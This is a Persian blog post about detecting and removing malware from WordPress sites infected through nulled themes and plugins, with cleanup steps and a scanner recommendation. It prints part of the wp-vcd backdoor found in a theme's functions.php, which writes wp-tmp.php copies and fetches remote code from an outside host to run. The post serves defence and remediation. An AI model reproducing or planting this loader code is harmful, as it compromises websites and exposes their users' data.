بالا بردن امنیت وب سایت های وردپرسی ، آموزش ویروس یابی وب سایت، دزدیدن اطلاعات مشتریان وب سایت وردپرس ، جلوگیری از هک شدن وب سایت وردپرس
Malwareیا بدافزار در اصل قطعه کدهایی هستند که توسط برنامه نویسان نوشته میشوند تا بوسیله آن بدون اجازه مالک سیستم، آن را آلوده و اقدام به کارهای ناخواسته یا خرابکارانه کنند. این واژه به صورت عمومی به تمامی کدها و برنامه های مخرب اطلاق میشود و به طور کلی هر نوع کدی که روی سیستم شما قرار بگیرد و عملیاتی ناخواسته را انجام دهد به عنوان بدافزار شناخته میشود، Malware میتواند گوشی تلفن، تبلت و کامپیوترها را آلوده کند.
بسیاری از طراحان ممکن است از قالب های آماده وب سایت و یا افزونه یا پلاگین های رایگان و یا Null شده یا به اصطلاح کرک شده استفاده نمایند، این موضوع ممکن است راحت ویا به صرفه برای طراح باشد و قطعا در برخی موارد اینگونه است ولی مشکل از آنجایی شروع می شود که تعدادی از قالب و افزونه های نال شده پس از نصب مشکلی ایجاد نمی کنند و به راحتی استفاده می شوند و اعتماد طراح را جلب می نمایند ولی بعد از گذشت مدتی طولانی به طور مثال حتی 3 الی 6 ماه از کارکرد عادی و عالی افزونه ویا قالب، به طور کاملا هوشمندانه و نامحسوس این افزونه ها که از قبل درگاه هایی برای نفوذ درخود داشته اند کدهای مخربی وارد قسمت های کاربردی وب سایت می کنند از جمله باز کردن پاپ آپ به عنوان بازدید از سایت های مدنظرشون که این موضوع باعث نارضایتی مشتریان وب سایت شده و به تدریج از بازدید آنها از وب سایت کم شده ولی موضوع مهمتر این کدها در برخی موارد خود را در قسمت یوزر و پسورد وب سایتها قرار میدهند و شروع به دزدیدن اطلاعات کاربران می کنند.
استفاده از وب سایت https://sitecheck.sucuri.net جهت اطمینان از ویروسی بودن وب سایت، درصورت ویروسی بودن به صورت ذیل نمایش داده می شود :
می توانید با استفاده از افزونه های انتی ویروس شروع به اسکن نمایید برخی انتی ویروسان فایل ها را پیداکرده و به راحتی کدهای مخرب را ازبین می برید، درصورتی که اسکن ناموفق بود خودتان فایل هایی را بگردید که تاریخ تغییرات فایل تازه باشد به این صورت به فایل مورد نظر می رسید و کدها را ازبین میبرید فقط توجه داشته باشین فقط فقط کدهای مخرب را پاک کنیدتا آسیبی به وب سایت شما نرسد، سپس بگردید کدام افزونه این کدمخرب را به سورس های اصلی تزریق کرده است و آن ها را حذف نمایید ویا با نسخه اورجینال آن تعویض نماییدتا تزریقات ادامه دار نباشد و مرحله بعدی آن فایلی که تزریق صورت گرفته بود را دسترسی فقط خواندنی به آن بدهید به عنوان مثال دسترسی 400 به آن بدهید.
public_html/shop.******.com/wp-content/themes/*****/function.php
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);
if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’)
AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent =
@file_get_contents(“http://www.fonjy.top/
code.php”) OR $tmpcontent = @file_get_contents_tcurl(”
http://www.fonjy.top/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
public_html/*********/wp-includes/
wp-vcd.php
wp-tmp.php
wp-feed.php
wp-diff.php
wp-cron.php
دوستان عزیز و همکاران گرامی امیدواریم در زمان استفاده از افزونه و قالب های نال شده وردپرس و یا دیگر CMS ها دقت کافی کرده و سعی کنید از سایت های معتبر تهیه نمایید.
آموزش ویروس یابی وب سایت و ازبین بردن ویروس و بدافزار های احتمالی وب سایت وردپرس ، دزدیدن اطلاعات مشتریان وب سایت وردپرس ، ویروس کشی وب سایت وردپرس و ازبین بردن Malware ، حذف بدافزار سایت ، امنیت وب سایت ، انتی ویروس وردپرس ، هک شدن سایت وردپرس ، جلوگیری از هک شدن وب سایت وردپرس ، بالا بردن امنیت وب سایت های وردپرسی ، دزدیدن اطلاعات مشتریان وب سایت وردپرس
